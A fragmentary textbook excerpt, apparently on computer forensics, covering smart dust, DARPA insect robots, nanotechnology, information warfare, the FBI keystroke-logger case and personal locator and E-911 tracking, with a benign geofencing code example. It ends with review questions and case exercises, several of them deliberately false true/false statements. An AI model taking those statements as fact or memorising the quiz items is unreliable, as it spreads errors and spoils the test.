Scientists recently set up a network of small, wireless sensors called motes that detect
birds as well as measure temperature, humidity, and barometric pressure
...
You can literally be anywhere in the world and
know what’s going on
...
Just as MRI technology revolutionized the ability to peer inside the body, the new networks are expected to shed much-needed
light on planetary problems like climate change and how pollutants move through
the environment
...
However, while smart dust is generating excitement, some people already are
concerned about the dark side of what will undoubtedly be its expanded presence on
the landscape
...
Sensors and computer chips have long been embedded in consumer products,
whether cars or refrigerators
...
Before the technology takes off, motes may have to get smaller—currently, prototypes are the size of matchboxes
...
These networks of tiny communicating computers could even function as a new kind of Internet that, by merging
with the physical world, would allow us to query almost anything—buildings, roads,
rivers—for information
...
, got funding from
the DoD’s Defense Advanced Research Projects Agency (DARPA) to develop tiny,
intelligent sensing devices
...
The initial challenge was
to miniaturize the components, including the sensors, radio transmitters, batteries,
and computer hardware
...
Recently, scientists solved this problem by designing software that enabled the motes to sleep most of the time, yet wake
up regularly to take readings and communicate
...
Indeed, an early test in March 2001 showed just how independent the devices
could be
...
As soon as they hit the ground, they
organized themselves into a network and began sensing the magnetic field around
them
...
Now, several companies make prototypes with customized sensors that are
showing great promise in field tests
...
In addition to eliminating miles of wiring (moving
out) and reducing the cost of the experiments 10-fold, the motes will give scientists
the first 3-D view of the redwood forest microclimate
...
Their goal is to better understand how the loss and fragmentation of redwood forests affect local climate and
water resources
...
Motes are poised to become practical tools for protecting and managing all sorts
of resources
...
In 2003, a vineyard in British
Columbia deployed a network of 65 motes to closely track temperature fluctuations
on its slopes
...
While the applications of wireless sensor networks seem endless, the first field
tests have revealed shortcomings, which companies are working hard to address
...
At times the radios have been as fickle as
cell phones in their signaling and reception
...
For instance, the Embedded Collaborative Computing Area at the
Palo Alto Research Center in California, is trying to reduce the volume of incoming
data by training the motes to pay attention only to what’s important in the surrounding environment
...
As motes are deployed more and more widely, the potential for the misuse of the
information they collect can only grow
...
Scientists don’t think it will be difficult to draw the lines, but they do need to ask, How far do we let this go? It’s a question far removed from observing seabirds on a wind-swept island
...
The idea is to build complex
gadgets so small one needs a microscope to see the parts, using fabrication methods
invented by the electronics industry for making silicon chips
...
Miniaturizing
them is well within current technology
...
Climate-control
systems in buildings would know exactly where it is too cold, humid, hot, or drafty
...
Eventually, you could log on to
readings from smart dust almost anywhere
...
NASA could scatter smart dust sensors into the Martian atmosphere and they’d settle all over the planet (like in the recent movie Red Planet)
...
In 1992, as a new associate professor at the
University of California-Los Angeles, Pister attended a Rand Corp
...
The topic was miniaturization of novel
battlefield surveillance methods
...
You could find out, for example, if a tank had gone by or whether there
was anthrax in the air
...
Poppy Seeds
Pister coined the label smart dust in 1996 and produced the first complete smart-dust particle in mid-2002, about 1 millimeter on a side, or roughly between a poppy seed and a grape seed in size
...
Before building the first fully small versions, however,
the team wants to be sure it can get oversize prototypes to work
...
Another student is designing a solid rocket micromotor, visible with a good magnifying glass, carved out of
silicon
...
Some smart dust may be equipped with solar cells for power
...
Sensors, at
first, would be simple (such as for temperature, humidity, a few targeted chemicals,
etc
...
Pister tells the grad students and postdocs in the engineering school’s smart
dust group that above all, they must have a passion for new ideas and teamwork
...
Love of freely flowing communication is appropriate from a man
who expects a tomorrow suffused with tiny snoops
...
His reply to nervous objections is simple
...
” Well, maybe
...
It
is an advantage that has proved difficult to attain: spies, satellites, and U-2s have all
failed to keep commanders from blundering into ambushes and mismatches
...
It’s having the sense that somebody’s out there trying to get you but having no idea of where the enemy might be
...
The researchers envision tomorrow’s soldiers coming to a hill,
halting, and reaching into their packs for cigar-shaped tubes
...
Equipped with cameras or acoustic sensors, the mechanical insects range forward
and provide data on the hazards that lie in wait on the other side: the number of
machine gun nests and the position of artillery
...
7 million from DARPA, military researchers are designing such
insect-inspired spies
...
Insect-shaped “micro
aerial vehicles” are next on the slate
...
In most robotic systems today, people think that if you want to move one joint,
then you need to attach a motor at that joint
...
It also reduces robots to the ranks of expensive toys
...
In the initial design, piezoelectric ceramics—thin, ceramic-coated metal wafers
that bend when an electrical current is applied to their surfaces—were proposed
...
When charged, one
half of the actuator expands while the other contracts, causing it to curve
...
The researchers attached titanium legs to these vibrating
strips
...
Because piezoelectrics require only occasional energy boosts to keep up the vibration, the bugs promise to be up to 70% more energy efficient than traditional robots
...
The
same work could more easily be accomplished by hooking that weight to a spring on
the ceiling, then displacing it a bit and letting it bounce up and down by itself
...
The bugs’ energy efficiency should give them ranges
of almost 600 yards and allow them enough juice to carry such intelligence-oriented
payloads as chip-size infrared detectors and quarter-size video cameras
...
Most things biological sort of oscillate as they walk
...
They were also impressed by the shape of daddy
longlegs, whose low-slung bodies and inverted-V legs create a stable configuration—important for robots that will have to scamper across uneven, sometimes
treacherous terrain
...
They
probably won’t survive being stomped on, but short of that they’re pretty tough
...
Before the bugs can be unleashed on the battlefield, however, a few major hurdles
remain
...
To get the bugs moving without the aid of chargers, circuitry must be developed to amplify the current, and it must be small enough to fit the 2-by-3/4-inch
bugs
...
Another lingering question is how a robotic swarm can be controlled
...
In the event of the mother ship’s destruction, the leadership role could be shifted to a surviving robot
...
DARPA officials and the researchers are optimistic that the kinks can be worked
out and that assembly-line production of the bugs is nearing
...
Once all design issues are resolved, the researchers believe, the insects could cost as little as $7 per unit
...
The low price makes the insects potential candidates for a variety of uses, including delivering lethal toxins on the battlefield or aiding police SWAT teams
...
Those missions are far distant,
though; the bugs’ first and foremost duty will be to give American troops an upper
hand and to save them from stumbling into situations too perilous to survive
...
NANOTECHNOLOGY
In 2000, a group of scientists from the University of Michigan’s Center for Biologic Nanotechnology traveled to the U.S. Army’s Dugway Proving Ground in Utah
...
” These munitions don’t exactly go “Kaboom!” They’re molecular-size droplets, roughly 1/5,000
the head of a pin, designed to blow up various microscopic enemies of mankind, including the spores containing the deadly biological warfare agent anthrax
...
In the test, the devices
achieved a remarkable 100% success rate, proving their unrivaled effectiveness as
a potential defense against anthrax attacks
...
For example, just by adjusting the bombs’ ratio of soybean oil, solvents,
detergents, and water, researchers can program them to kill the bugs that cause influenza and herpes
...
coli, salmonella, or listeria before they
can reach the intestine
...
Over the past 23 years, scores of novels and movies have explored the implications of mankind’s learning to build devices the size of molecules
...
R
...
Since 1999, a series of breakthroughs have transformed nanotech from sci-fi
fantasy into a real-world applied science and, in the process, inspired huge investments by business, academia, and government
...
Silicon Fingers
Meanwhile, nearly every week, corporate and academic labs report advances in
nanotech with broad commercial and medical implications
...
Within a decade or so,
such devices may be able to track down and destroy cancer cells
...
” In tests announced in 2003, the machine’s rotor spun for 120 minutes at 6 to 7
revolutions per second
...
These inventions and products are just the beginning of what many observers
predict will be a new industrial revolution fostered by man’s growing prowess at
manipulating matter one atom, or molecule, at a time
...
Nanotech takes its name from the nanometer, a unit of measurement just one billionth of a meter long
...
Materials with 10 times the strength of steel and only
a small fraction of the weight
...
Or detecting cancerous tumors
when they are only a few cells in size
...
Such feats include imitating the workings of the body, where DNA not only programs cells to replicate
themselves but also instructs them how to assemble individual molecules into new
materials such as hair or milk
...
Atom by Atom
The inspiration for nanotech goes back to a 1959 speech by the late physicist Richard
Feynman, titled “There’s Plenty of Room at the Bottom
...
Starting in the Stone Age, all human technology, from sharpening
arrowheads to etching silicon chips, has involved whittling or fusing billions of
atoms at a time into useful forms
...
Four decades later, Chad Mirkin, a chemistry professor at Northwestern University’s $45-million nanotech center, used a nanoscale device to etch most of Feynman’s speech onto a surface the size of about 10 tobacco smoke particles—a feat
that Feynman would no doubt have taken as vindication
...
Nor has it been
lacking in controversy
...
In
2000, the chief scientist at Sun Microsystems created a stir when he warned that in
the wrong hands, nanotech could be more destructive than nuclear weapons
...
Most researchers in the field don’t share that type of concern
...
Researchers are knocking on the door of creating new living
things, new hybrids of robotics and biology
...
The early payoffs have already arrived
...
Another familiar product, Dr
...
Nanoparticles also help make car and
floor waxes that are harder and more durable and eyeglasses that are less likely to
scratch
...
What accounts for the sudden acceleration of nanotechnology? A key breakthrough came in 1990, when researchers at IBM’s Almaden Research Center succeeded
in rearranging individual atoms at will
...
The entire logo measured less than three nanometers
...
Using a tool known as a molecular beam epitaxy, scientists
have learned to create ultrafine films of specialized crystals, built up one molecular
layer at a time
...
One quality of such films, which are known as giant magnetoresistant materials, or GMRs, is that their electrical resistance changes drastically in the presence of
a magnetic field
...
In a few years, scientists are
expected to produce memory chips built out of GMR material that can preserve 100
megabits of data without using electricity
...
Natural Motion
The next stage in the development of nanotechnology borrows a page from nature
...
Living cells contain all sorts of nanoscale motors made of proteins that
perform myriad mechanical and chemical functions, from muscle contraction to
photosynthesis
...
Animals such as the abalone, for example, have cellular motors that combine
the crumbly substance found in schoolroom chalk with a “mortar” of proteins and
carbohydrates to create elaborate, nano-structured shells so strong they can’t be
shattered by a hammer
...
How are these biologically inspired machines constructed? Often, they construct themselves, manifesting a phenomenon of nature known as self-assembly
...
For example, the two strands that make up DNA’s
double helix match each other exactly, which means that if they are separated in a
complex chemical mixture, they are still able to find each other easily
...
For instance, in 1999, a team of German scientists attached building materials such
as gold spheres to individual strands of DNA and then watched as the strands found
each other and bound together the components they carried, creating a wholly new
material
...
Scientists expect that when they succeed in
weaving nanotubes into larger strands, the resulting material will be 100 times
stronger than steel, conduct electricity better than copper, and conduct heat better
than diamond
...
In 2000, a team of IBM scientists announced that they had used self-assembly
principles to create a new class of magnetic materials that could one day allow computer hard disks and other data-storage systems to store more than 100 times more
data than today’s products
...
Other scientists have discovered important new self-assembling entities by accident
...
” He saw the potential right away
...
Soon afterward, Stupp discovered, again accidentally, that he could easily program these supramolecules to form film that behaves
like Scotch tape
...
Eventually, the researchers hope to
build memory chips smaller than a bacterium
...
This is because the more densely packed the transistors on a chip
become, the faster it can process, and we are approaching the natural limit to how
small transistors can be fabricated out of silicon
...
Swarms of programmable particles, sometimes referred to as “utility fog,” will assemble themselves on
command
...
Meanwhile, new, superstrong, lightweight nanomaterials could make space
travel cheap and easy and maybe even worth the bother, if, as some scientists predict, nanotech can be used to create an Earth-like atmosphere on Mars
...
It all seems hard to imagine, yet nanotech has already produced enough
small wonders to make such big ideas seem plausible, if not alarming—at least to
the high priests of science and the IW military strategists
...
Technology has already been used effectively by U.S. forces in the Gulf War, in Iraq and in the conflict in Haiti
...
Those countries most capable of waging it are also the ones most vulnerable to it
...
Conclusions
Even though the anticipated national security threats of the coming decades involve less-developed countries, the Collaborative Virtual Workspace (CVW)
threat and other methods of intrusion and disruption are not necessarily beyond their reach
...
Opportunities to deceive and confuse through an elaborate misinformation
scheme along a myriad of information paths are available to anyone
...
There exists the prospect of an intelligence analyst manipulating an adversary’s
command-and-control system so that reality is distorted
...
Imagine a scenario depicting a “left hook” in the Iranian desert that fails because the systems in use were successfully attacked by CVW, or some other intrusion method, with the resulting disruption putting U.S. troops in a flailing posture—facing the unknown and losing confidence in their operation
...
An Iranian “left hook” will be difficult to repeat
...
The IW arsenal is coming of age
...
The necessity to prevent irresponsible groups and individuals from getting access to nanotechnological manufacturing capability will be a prime concern in
the near future
...
An Agenda for Action
In the United States, where the threat is most immediately recognized, debate is
currently going on to decide what part government can and should play in protecting civilian networks
...
Government regulation would seem to be interference or even repression
...
One solution is to require organizations with a dependence on sensitive information technology to fulfill certain security criteria before being issued a government license
...
The U.S. government needs to set an agenda for action that goes beyond the work already done in preparation for defending against the IW arsenal of the future
...
1 in Appendix F
...
The answers and solutions by chapter can be found in Appendix E
...
True or False? Even though the anticipated national security threats of the coming decades involve less-developed countries, the CVW threat and other methods of intrusion and disruption are necessarily beyond their reach
...
True or False? Opportunities to deceive and confuse through an elaborate misinformation scheme along a myriad of information paths are not available to
anyone
...
True or False? The IW arsenal of the future provides an old avenue to employ
deception techniques through the use of multiple paths that create the perception and validation of truth
...
True or False? Tomorrow’s soldier will depend more than ever on the very
well-known and trusted factors of mobility
...
True or False? One can assume that Iran, and others, will exploit the GPS to
their own advantage
...
Among the current possible offensive weapons are the following, except:
A
...
Nuclear bombs, another type of virus which can lie dormant for years,
until, upon receiving a particular signal, would wake up and begin attacking the host system
C
...
Worms, whose purpose is to self-replicate ad infinitum, thus eating up a
system’s resources
E
...
The Privacy Foundation at the University of Denver conducts research into
communications technologies and provides the public with tools to maintain
privacy in the Information Age
...
The report cites the following possible uses for
this security breach, except:
A
...
B
...
C
...
D
...
3
...
Open source intelligence
B
...
Displays
D
...
The electromagnetic device will be detonated by the missile’s onboard fusing
system
...
Navigation system
B
...
Internet protocol
D
...
Air-to-air missile, the proximity fusing system
5
...
The near future
B
...
Traditional psychological operations or deception operations
D
...
Clandestine human intelligence operations or overt research operations
Exercise
In a breach of contract case it was decided on a Friday to use a computer forensics
specialist (CFS) to recover company emails
...
Over 1,090,000 total emails met the criteria
...
How was the CFS able to go about recovering the email?
HANDS-ON PROJECTS
An examiner at a major financial institution in Chicago successfully previewed two
drives in Asia connected to the company-wide area network
...
The preview process revealed that
one of the drives contained highly relevant information and the drive was promptly
acquired for further forensic analysis in Chicago
...
How did the CFS go about conducting the investigation?
Optional Team Case Project
Law enforcement investigators arrived at a company site to collect computer evidence from a server
...
How was the CFS able to go about
conducting the investigation?
REFERENCES
[1] Vacca, John R
...
, Prentice Hall, New York,
2001
...
, i-mode Crash Course, McGraw-Hill, New York, 2002
...
, Satellite Encryption, Academic Press, New York, 1999
...
, The World’s 20 Greatest Unsolved Problems, Prentice Hall,
New York, 2004
...
K
...
18 Surveillance Tools for Information Warfare of the Future
Wireless systems [1] capable of monitoring vehicles and people all over the
planet (basically everything) are leaving businesses and the military
aglow with new possibilities—and some privacy advocates deeply concerned
...
Scientists have developed a chip that can be inserted
beneath the skin, so that a person’s location can be pinpointed anywhere
...
When he
signed up for this service, he told his guys, “Big Brother’s keeping an eye on you,
and I’m Big Brother
...
These technologies have become one of the fastest-growing areas of the wireless
communications industry
...
MONITORING EVERYTHING
A federal effort to make it easier to pinpoint the location of people making emergency 911 calls from mobile phones means that cell phones sold in the United
States are now equipped with advanced wireless tracking technology
...
One Florida company wants to provide parents with wireless watchbands that they can use to keep
track of their children
...
By allowing location-based services to proliferate, you’re opening the door to a new realm of privacy abuses
...
Until recently, location-based services belonged more in the realm of science
fiction than commerce
...
GPS uses satellite
signals to determine geographic coordinates that indicate where the person with the
receiving device is situated
...
Real-life improvements in the technology have come largely from research initiatives by start-up companies in the United States, Canada, and Europe as well as
from large companies like IBM, which recently formed a “pervasive computing” division to focus on wireless technologies such as location-based services
...
It’s no surprise that a
whole new ecology of small companies has formed to focus on making it all more
precise
...
After all, he reasoned, wouldn’t the whereabouts of an Alzheimer’s patient
be important to relatives? Wouldn’t the government want to keep track of paroled
convicts? Wouldn’t parents want to know where their children are at 10 P.M., 11 P.M., or any hour of the day?
A review of Digital Angel’s commercial potential, though, revealed concern
over the possibility of privacy abuses [3]
...
Embedding technology in people is too
controversial, but that doesn’t mean a system capable of tracking people wherever
they go won’t have great value
...
That Professor Zhou found himself in the middle of the privacy debate is no
surprise, given the growing interest in location-based services
...
Some of the world’s largest wireless carriers, such as Verizon Wireless, Vodafone
of Britain, and NTT DoCoMo of Japan, are promoting the technology, in addition
to dozens of small companies in the United States and Europe
...
Meanwhile Cell-Loc Inc
...
Some companies are even more ambitious
...
While businesses around the world seek to improve the quality of location-based
services, the biggest impetus behind the advancement of the technology has come
from the federal government, through its effort to improve the precision of locating
wireless 911 emergency calls
...
With the number of wireless users growing, carriers are now equipping either
cell phones or their communications networks with technology that would allow
authorities to determine the location of most callers to within 600 feet, compared
with current systems that can locate them within about 900 feet
...
Supporters of the initiative, called “E-911” for
“enhanced 911,” expect the technology’s precision to be even better than the federally mandated 600-foot radius
...
Although the E-911 initiative has driven wireless carriers in the United
States to improve their location technology, industry groups have started to grapple with privacy issues
...
The association
will endorse companies that adhere to the policy
...
They need to be assured that there is no conspiracy to use this information in an underhanded way
...
Scarfo, the son of Philadelphia’s former mob boss, was almost paranoid enough
...
FBI agents sneaked into
Scarfo’s office in Belleville, New Jersey, on May 10, 1999, and installed a keyboard-sniffing device to record his password when he typed it in
...
The case, which is still awaiting trial, appears to be the first in which the U.S. government used such aggressive surveillance techniques during an investigation; some legal observers say the FBI’s breaking-and-entering procedures go too far
...
Scarfo’s prosecution comes at a time when the FBI’s Carnivore surveillance system (discussed in Chapter 17) is under increasingly heavy fire from privacy groups,
and the use of data-scrambling encryption products appears to be growing
...
Scarfo has been charged with supervising an illegal gambling business in violation
of state and federal law and using extortionate loan shark tactics, according to a three-count indictment filed in federal court in June 2000
...
The elder Scarfo, who once ran the Philadelphia mob that also dominated the
Atlantic City gambling racket, was imprisoned in 1991 on racketeering charges
...
The idea first publicly surfaced in mid-1999, when the Justice Department proposed legislation that would let police obtain surreptitious warrants and “postpone” notifying the person whose property they entered for 30 days
...
In the final draft of the Cyberspace Electronic Security Act submitted to Congress, the secret-search portions had disappeared
...
When criminals such as drug dealers and terrorists use encryption to conceal
their communications, law enforcement must be able to respond in a manner that
will not thwart an investigation or tip off a suspect
...
A related “secret search” proposal resurfaced in May 2000 in a Senate bankruptcy bill
...
Scarfo’s computer by recording the key-related information as it is entered
...
With the PGP private
key and Scarfo’s secret password, the government could then view whatever documents or files he had encrypted and stored on his computer
...
S
...
Donald Haneke granted the FBI’s request
...
The interesting issue is
that in those (court) documents the FBI specifically disclaim any reliance on the wiretap statute
...
If the government is now talking about expanding black bag jobs to every case
in which it has an interest and where the subject is using a computer and encryption, the number of break-ins is going to skyrocket
...
However, the government could successfully argue that break-ins are constitutional
...
In many respects, it’s no different from a wiretap
...
The FBI’s got everything that
Scarfo typed on that keyboard (a letter to his lawyer, personal and medical records,
legitimate business records, etc
...
The next part of the chapter will take a close look at these information
warfare (IW) tracking devices
...
M
...
Her 74-year-old husband, who suffers from dementia, had left four hours earlier and had not yet returned
...
Within a minute, the provider
found him on the second floor of a department store, simply by paging a miniature
locator device secured to the man’s clothes
...
Fortunately, the service provider continued tracking the elderly man and was able to direct the son to
the fourth floor of an Osaka hotel
...
M
...
Locus Corp
...
The belief that it should be easy to find anyone, anywhere, at any time with a
few pushes of a button has caught on with the advent of the GPS
...
Add the highly practical need to find missing persons promptly,
and the personal locator system (PLS) industry is born
...
Some are already being deployed in Japan
...
Several companies looking into the technology options plan to offer
a broad array of services to the public and to businesses
...
Initially designed to support the mentally handicapped, personal locator
services have expanded to serve children, the elderly, tourist groups, and security
patrols, as well
...
Not surprisingly, service areas coincide with wireless infrastructure deployments, which personal locators have exploited since their beginning in 1998
...
One is the need to effectively monitor offenders on parole and
probation
...
The other
is the wish to provide wireless callers with enhanced 911 (E-911) emergency services
...
Callers using
cellular phones could be anywhere and unlocatable, unless location technology
were applied to the wireless telephone system
...
Unlike vehicular locators, which
are less constrained by size and power, locators borne on the person have to be the
size of a pager, and their power output has to be less than 1 W, because they can
only carry a small battery that cannot be continuously recharged
...
One PLS Architecture
A PLS is likely to involve a service provider, a location center, and a wireless network
...
The person bearing a locator device is either being sought by a subscriber
to the service, is seeking help from the subscriber, or, as in the case of a parolee, is
having his or her whereabouts monitored continuously
...
It is representative of the first scenario, based on the paging mode, wherein
the person with the locator device is sought
...
The operator enters the ID into a computer,
which transmits it to another computer at the location center
...
Immediately
the office forwards the call to the wireless base station nearest the locator
...
The locator replies, and from those inputs, plus RF database information
on the base stations, the center computes the locator’s coordinates
...
”
These coordinates are transmitted to the service provider’s computer, which
displays the missing person’s position on a street map for the service operator to report to the subscriber
...
In a second scenario, involving the emergency mode, the user of the locator is
lost or in dire straits of one sort or another and presses the device’s panic button
...
The system can employ either packet data or voice channel communications
...
If a voice channel is used, the wait could last up to 33 seconds because of processing differences between the two channel types
...
Such a human interface may be necessary given the complexity of Japanese (as explained in the Japanese example earlier) city-addressing
schemes
...
Both the emergency and paging operating modes of PLSs are characterized as
intermittent
...
Strictly speaking, the polling is periodic rather than
continuous, but the latter term is more common
...
If it were implemented
with a continuous voice call between the system and the locator, the expense would
be beyond the reach of most applications
...
59 a day—and also drain
the locator battery within a few hours
...
In the packet version, the locator is likely to be polled every few minutes, exchanging 100 bytes or so with the system in a fraction of a second
...
80
...
Another plus: upcoming third-generation mobile wireless telephony
will increase the availability of packet data communications
...
Among the most common methods
are angle and time difference of the signal’s arrival, GPS and the more recent assisted GPS, enhanced signal strength, and location fingerprinting
...
This can be done by pointing a directional
antenna along the line of maximum signal strength
...
A two-element antenna is typically used to cover
angles of ±60 degrees
...
A single mobile directional antenna can give only the bearing, not the position,
of a transmitting object
...
Such an antenna is generally used to
approach and locate objects up to several kilometers away
...
The same basic technique is used by LoJack Corp
...
With two directional antennas spaced well apart, however, the position of a
transmitting device in a plane can be computed
...
Angle measurement precision affects the accuracy of positioning calculations,
as does the geometry of the transmitting device and receiving antennas
...
Fortunately, multiple receiver antennas distributed throughout the area of coverage
enable the cellular system to select those antennas that introduce the smallest error
...
Given the
speed of light and known transmit and receive times, the distance between the mobile locator and receiver antenna can be calculated
...
Also, all clocks used must be synchronized, but as synchronizing the mobile locator clock is usually impractical, at least
three receiving antennas are required for the calculation
...
As with the angle of arrival method, the relative
positions of receivers and transmitter affect computational errors
...
This technique is known as forward link trilateration (FLT)
...
Global Positioning System
As previously explained, GPS relies on a nominal constellation of 24 satellites
...
The satellites transmit spread-spectrum signals on two frequency bands denoted L1 (1575.42 MHz) and L2 (1227.6 MHz)
...
The GPS signal is further modulated with a
data message known as the GPS navigation message
...
To acquire the satellites’ signals, the GPS receiver generates a replica of the
satellites’ pseudorandom noise codes
...
If the receiver cannot match and synchronize its
replica, the GPS signal appears to the receiver as noise
...
The accuracy of GPS position calculations depends partly on measurement accuracy and partly on satellite configuration
...
With selective availability (the deliberate degradation of the civilian signal) switched on, total measurement errors are estimated
at 35 meters; without it, they are reduced to 8 meters. Selective availability was switched off permanently in May 2000, so the lower figure is the one that applies to current receivers
...
If those in sight are scattered throughout the sky, the measurement error is multiplied by about 1
...
If they are clustered together, the multiplier is
5 or more
...
To
determine its position, a GPS receiver solves for its x, y, and z coordinates and for the
offset of its own inexpensive clock from satellite time, using the measured arrival times of the satellite signals; four unknowns require signals from at least four satellites
...
When fewer than four satellites are in
view, in areas such as city canyons, one remedy is a hybrid approach, augmenting
GPS with the land-based measurements called “forward link trilateration”
...
The unobstructed line of sight to the orbiting transmitters is important
...
Moreover, a conventional GPS
receiver could take several minutes to acquire the satellite signals and, therefore,
tends to operate continuously rather than be turned on and off for each acquisition
...
Server-Assisted GPS
To combat the shortcomings of GPS, an innovative technique known as “server-assisted GPS” was introduced in 1998
...
In effect, the servers are stationary GPS receivers that enhance the mobile GPS
receiver’s capabilities by helping to carry the satellites’ weak signals to the locator
...
To ask a mobile GPS receiver for its position, the server feeds it satellite information through the radio interface
...
Within about a second, the GPS receiver collects sufficient information for geolocation computation and sends the data back to the server
...
With the assisted GPS approach, the mobile receivers conserve power by not continuously tracking the satellites’ signals
...
In addition, the assisted version of the technology attains greater accuracy
...
In other words, assisted GPS is inherently differential
GPS (DGPS), which counters some of the inaccuracy in civilian GPS service
...
In June of 2000, Lucent Technologies Inc
...
More good news in this field was announced by SiRF Technology Inc
...
In addition to providing improved GPS capability, it also offers reduced
power consumption and greater accuracy, as well as performing well at handling
weak signals
...
When timing is used, the speed of light multiplied by the time a signal takes to propagate between the two points gives the distance between them
...
560
Computer Forensics, Second Edition
However, direct line contact
seldom exists inside buildings, where signal attenuation is usually unknown and many
indirect paths between transmitter and receiver are likely
...
Multipath effects impede signal timing methods somewhat, but affect signal strength methods even more
...
In contrast, signal timing is unaffected by antenna orientation and is less sensitive to attenuation
...
Such a
system takes in three-dimensional information on the lay of the land, buildings,
elevated highways, railroads, and other obstructions and uses it to simulate the RF
signal propagation characteristics of every PHS (Personal Handyphone System) wireless transmitting antenna in
the area of interest
...
The position of a mobile locator is determined by getting it to measure the signal strength of preferably three to five base stations
...
The mean accuracy of the ESS is 40–50 meters
...
In subway and railroad stations, the availability of base stations makes
it possible to find an individual on a specific track
...
’s ESS method weighs only 58
grams and can operate for 16 days on a single battery charge
...
Presently, researchers in Japan are investigating how
to apply ESS technology to other wireless phone systems
...
U.S. Wireless, of San Ramon, California, relies on signal structure characteristics
...
U.S. Wireless’s proprietary RadioCamera system includes a signal signature
database of a location grid for a specific service area
...
The
system analyzes the incoming signals, compiles a unique signature for each square
in the location grid, and stores it in the database
...
To determine the position of a mobile transmitter, the RadioCamera system
matches the transmitter’s signal signature to an entry in the database
...
The system can use
data from only a single point to determine location
...
What’s PLS Good For?
In the United States, the need to provide wireless phone users with emergency 911
services has been one of the spurs to the development of location technologies
...
When the match is made, this database
provides the PSAP (public safety answering point) with the street address plus a location in a building—maybe the
floor or office of the caller handset
...
The very mobility of wireless handsets rules out a simple database relationship
between phone number and location
...
Accordingly, the U.S. Federal Communications Commission (FCC) directed
operators of wireless phone services to enable their E-911 services to locate callers
...
The first required an accuracy of several kilometers by April 1998 and the second required an accuracy of 125 meters with 0
...
Whereas the first phase needed only software changes to the
system, the second required the adoption of new location technologies
...
However, a
network-only solution would preclude the use of emerging technologies, such as assisted GPS, because that would require handset modification in addition to any network infrastructure and software changes
...
To ease the introduction of new technologies, in September 1999, the FCC
modified its original Phase II directive to permit handset-enabled solutions and
also to tighten the accuracy required
...
Upgrading all
the wireless networks will cost billions of dollars
...
Although wireless subscribers are the most likely
source of recouping the cost, the government has made no formal decisions yet
...
In an international development, a working group of the European Telecommunications Standards Institute (ETSI), based in Sophia Antipolis, France, is currently
drafting a standard for supporting location services for the Global System for Mobile
Communications (GSM)
...
Monitoring Tops Services List
Wireless E-911 just helps the individual, but monitoring the mentally impaired
and criminals could have even greater impacts on society at large
...
So will the number of elderly afflicted with
age-related mental impairments
...
Recall how personal locator technology helped a family find a mentally impaired elderly man, fortunately within 50 minutes or so
...
An automatic polling system could solve this problem by
checking whether the man was within a defined polygonal area or not—the location
service and the family would be alerted whenever the man went out of this area
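The polygon check such an automatic polling system needs, as an added example (not from the book): each polled fix is tested against the fence with the even-odd ray-casting rule, and an alert is raised only after two consecutive outside fixes, so that the tens of metres of positioning error discussed above do not trigger false alarms near the boundary. The fence corners and the fixes are constructed coordinates in degrees of longitude and latitude; for an area this small, treating them as planar is adequate.

```python
def inside_polygon(point, polygon):
    """Even-odd rule: a point is inside if a ray cast from it towards +x crosses an odd number of edges."""
    px, py = point
    inside = False
    n = len(polygon)
    for i in range(n):
        x1, y1 = polygon[i]
        x2, y2 = polygon[(i + 1) % n]
        if (y1 > py) != (y2 > py):                        # edge straddles the ray's y
            x_cross = x1 + (py - y1) * (x2 - x1) / (y2 - y1)
            if px < x_cross:                              # crossing lies to the right of the point
                inside = not inside
    return inside

def geofence_alerts(fixes, fence, confirm=2):
    """
    fixes: (timestamp, lon, lat) from the polled locator, in time order.
    Returns the timestamps at which `confirm` consecutive fixes fell outside the fence.
    Requiring consecutive outside fixes absorbs single noisy fixes near the edge.
    """
    alerts = []
    outside_run = 0
    for ts, lon, lat in fixes:
        if inside_polygon((lon, lat), fence):
            outside_run = 0
        else:
            outside_run += 1
            if outside_run == confirm:
                alerts.append(ts)
    return alerts

# constructed fence: a few blocks of a neighbourhood, as (lon, lat) corners
FENCE = [(-122.340, 47.610), (-122.330, 47.610), (-122.330, 47.620), (-122.340, 47.620)]

# constructed polled fixes, five minutes apart; the third is a single noisy fix
FIXES = [
    ("09:00", -122.335, 47.615),
    ("09:05", -122.334, 47.616),
    ("09:10", -122.3295, 47.615),   # just over the east edge, then back inside
    ("09:15", -122.333, 47.614),
    ("09:20", -122.325, 47.613),
    ("09:25", -122.320, 47.612),
]

if __name__ == "__main__":
    print(geofence_alerts(FIXES, FENCE))   # ['09:25']
```

With `confirm=1` the noisy 09:10 fix would also raise an alert; the right value depends on the fix error of the locator in use and on how quickly the family needs to know.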
...
Today it costs over $70,000 per year in the United States to care for a patient in a nursing home
...
Criminal justice is another area of social concern where personal locators could
intervene
...
In 2003, according to U.S. Department of Justice statistics, almost 8
...
In comparison, in Japan in 2003,
only 468,000 were serving prison terms while 423,000 were on parole or probation
...
First-generation monitoring systems, introduced in the mid-1980s, track the location of the offender in a very confined area, such as the home
...
...
Second-generation monitoring systems do better
...
The newer system compares the actual with the supposed positions of
the offender, as stored in a database
...
The goal is to verify that parolees and probationers comply with the directives
imposed by the corrections system as to where and when they should and should not
be by day and night
...
Storage of the offender’s ongoing whereabouts in an electronic file benefits law
enforcement agencies in other ways [6]
...
Privacy, Security Still Issues
Confidentiality of information about a person’s whereabouts is a serious concern
for location technology
...
Lax security could lead to serious abuse of this data
...
Moreover, it can have real-time implications
...
The location information stored in databases needs to be secured, as does the
tracking and locating process itself
...
To reduce this risk, location information can be encrypted before it is stored or transmitted. Spread-spectrum air interfaces such as
CDMA make casual interception harder, but the spreading codes are known to the network and to anyone with suitable equipment, so they are not a substitute for encrypting the location data itself
...
For example, in
GPS or the ESS method, the location system uses information captured and transmitted by the locator
...
In network-based
locator systems that measure the locator’s signal characteristics without requiring
its cooperation, the only safe way for users to keep their locations secret is to turn
off the device
...
In addition, hybrid systems may be required to provide improved coverage and open the door to new applications
...
The concern over how to pay for E-911 services demonstrates the need for cost reduction
...
The new location technologies, as well as wireless data packet services that are now emerging around the
globe, offer opportunities for entrepreneurs to expand personal locator services
...
Loc8.net (http://www.loc8.net), based in Seattle, Washington,
began to provide location-based services employing the ReFLEX two-way paging
wireless infrastructure
...
The two-way paging systems using ReFLEX, developed
by Motorola Inc
...
Recent advances such as assisted GPS are likely to enhance GPS-based offender-monitoring systems, reducing device size and power consumption, adding to accuracy, and offering new capabilities such as in-building tracking
...
Equipping young children with
personal locators may offer parents greater peace of mind
...
Personal locators could also be helpful to medical patients where the locator
would be combined with a detector that monitors the patient’s vital signs
...
Such a service could offer a patient
greater freedom and a shorter stay in hospital or nursing home
...
Obviously, technical and commercial considerations will determine the success
of the technology
...
